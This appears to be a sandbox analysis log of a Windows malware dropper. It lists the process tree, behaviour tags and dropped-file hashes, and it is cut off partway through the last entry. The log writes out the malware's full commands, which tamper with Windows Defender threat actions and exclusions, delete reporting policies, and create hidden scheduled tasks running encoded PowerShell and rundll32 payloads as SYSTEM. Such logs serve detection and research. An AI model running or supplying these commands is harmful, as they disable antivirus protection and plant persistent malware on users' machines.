C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\UnPYynO.exeC:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\UnPYynO.exe Qf /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CXdyuXxQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CXdyuXxQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCSurMlfClMRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCSurMlfClMRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YnFPtusxCOTU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YnFPtusxCOTU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bOFQhydRtxUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bOFQhydRtxUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\RIEoyfpemMjlUPVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\RIEoyfpemMjlUPVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MNBTbrbBidagOXts\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MNBTbrbBidagOXts\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCSurMlfClMRC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCSurMlfClMRC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnFPtusxCOTU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnFPtusxCOTU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOFQhydRtxUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOFQhydRtxUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\RIEoyfpemMjlUPVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\RIEoyfpemMjlUPVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MNBTbrbBidagOXts /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MNBTbrbBidagOXts /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYnXJcTPQ" /SC once /ST 04:06:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYnXJcTPQ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYnXJcTPQ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GrrjjXtPjBVPFNmZQ" /SC once /ST 13:59:45 /RU "SYSTEM" /TR "\"C:\Windows\Temp\MNBTbrbBidagOXts\wfcQztgHEpfDsSn\wODCOUg.exe\" 76 /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GrrjjXtPjBVPFNmZQ"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\MNBTbrbBidagOXts\wfcQztgHEpfDsSn\wODCOUg.exeC:\Windows\Temp\MNBTbrbBidagOXts\wfcQztgHEpfDsSn\wODCOUg.exe 76 /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "beNJzxXkYGhzSCmkZn"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\CXdyuXxQU\wUHcGx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ErhcMqZyPKQzNnH" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ErhcMqZyPKQzNnH2" /F /xml "C:\Program Files (x86)\CXdyuXxQU\PqQguXe.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ErhcMqZyPKQzNnH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ErhcMqZyPKQzNnH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TzHNCgqXVcbCsT" /F /xml "C:\Program Files (x86)\YnFPtusxCOTU2\jIBqKEW.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UfarzoSChLufz2" /F /xml "C:\ProgramData\RIEoyfpemMjlUPVB\qdZEqYC.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iQozJLGfyohvxjpyN2" /F /xml "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR\oSpMDxc.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ASXvXFEBgQcQQTYguNW2" /F /xml "C:\Program Files (x86)\LCSurMlfClMRC\NvkEBQv.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NSdDFfEujjmGqHjBl" /SC once /ST 09:56:45 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\MNBTbrbBidagOXts\KEOgRByf\YcztlOi.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "NSdDFfEujjmGqHjBl"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GrrjjXtPjBVPFNmZQ"2⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MNBTbrbBidagOXts\KEOgRByf\YcztlOi.dll",#1 /site_id 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MNBTbrbBidagOXts\KEOgRByf\YcztlOi.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NSdDFfEujjmGqHjBl"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\CXdyuXxQU\PqQguXe.xmlFilesize
2KB
MD5625c42479fe0e344059ac15709d9efff
SHA19f7968563806488ea4cbf6d8e778fc0a1d349268
SHA2562c0755034f54e20413680a7bf106466908c3b4b90cdd74776a3accd189e24a8a
SHA512633e8f5bd1799419c8ef3a02cb9a9763dde45640e180ad7be3b7709e9e01f14c535226a1229a18cc9219a166303cc2d0528d79ed186f3ae80fbf1d00f9fc6344
-
C:\Program Files (x86)\LCSurMlfClMRC\NvkEBQv.xmlFilesize
2KB
MD52ff54dd66250f25e3f177c9bbb439c24
SHA14f7a329be93a811eb120ab0abf2b5b6f83c5f9f5
SHA256b0c1bd10c9fa0d3408c88efd7004cc196a3a31cfd2ac39630eb5c29339608ef3
SHA5124b2caa53b2a2d0752105ffb7765acd5355d204eef570e71df7360b2edc181492c8b747f9a9f20fe92de42630c02f969323730685fba1f5b0d7d8d02c9b199807
-
C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR\oSpMDxc.xmlFilesize
2KB
MD53450f59809bba7eff85604e408fa63ed
SHA1031df88a2e20320075206d37075053a888da37d3
SHA256abc73108633dd0348efa06338f49bce54e769afad0bf299e781b5ed044178eca
SHA5121a20ed475ae304848d2ec16be0085805f7a3d0cc2bb4eded28f5aef01270cf8d4d293be8470f70cc712c52efd6ec1fa038a4d1e6c03fdc01517085c9da97ac80
-
C:\Program Files (x86)\YnFPtusxCOTU2\jIBqKEW.xmlFilesize
2KB
MD5dd36405d9a78f74aa5680ad59f7d815a
SHA1359ec50037b17c54265abb8ba86543ca8e4883ab
SHA2564c09c33f62a8c1af374742e09588a0ccf6ebe058fd5f143f011e5499957a1ef3
SHA5125fd7714061bd8e5bf2196c8754131385180c416f32e1b8633bf1488c8b850f5cafca62a3901dd872b5bd39400eee5092d57a1b35a463a9bcbf66e0d93374990d
-
C:\ProgramData\RIEoyfpemMjlUPVB\qdZEqYC.xmlFilesize
2KB
MD54359b2ff8dbddf1e203b87c540088635
SHA125c81595bf69a05302e368e459f2952284a27e63
SHA2568f20a0a18d00928dce68043196e79904f6bd0fb1eb26385cec622031562ca61a
SHA5121d18d61997ea7445158520b27859295269db0aa6a709eee970a06cee54dcc5ef03e7fa4c4d5e88d1769f5a4a6d6c82e1967ddfb6fddd1a35f5f00b43f76aea7c
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
C:\Users\Admin\AppData\Local\Temp\7zSB8C5.tmp\Install.exeFilesize
6.4MB
MD54957ff5d98c6ced7bb9e10780acd5e23
SHA1a581702dc28711869de88b0621cc047df85cc272
